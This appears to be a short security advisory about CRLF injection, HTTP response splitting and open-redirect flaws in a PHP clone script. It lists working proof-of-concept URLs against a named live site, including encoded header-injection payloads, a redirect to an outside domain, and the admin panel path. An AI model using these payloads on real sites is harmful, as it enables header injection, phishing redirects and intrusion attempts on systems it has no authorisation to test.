Glambombworld PHP Clone Script suffers from a header injection vulnerability. Warning: viewing the demo site is not safe for work.
f57354df099e3a205d21612ed8b2299b04739e5da4e01ed5c8497b9926512e92
Glambombworld PHP Clone Script CRLF injection/HTTP response splitting Vulnerability
==================================================================================
Author indoushka
=================
vendor :http://vk.com/doc227142112_238900463?dl=scriptux
=================
# Demo
glambombworld.com/pics/out.php?gr=1&id=5cd700&url=%0d%0a%20SomeCustomInjectedHeader:inj3ct0r
glambombworld.com/tp/out.php?url=%0d%0a%20SomeCustomInjectedHeader:inj3ct0r
Host header attack
http://www.glambombworld.com/tp/trade.php
URL redirection
glambombworld.com/pics/out.php?gr=1&id=bc0b32&url=http://www.google.dz
cp : http://www.glambombworld.com/manager/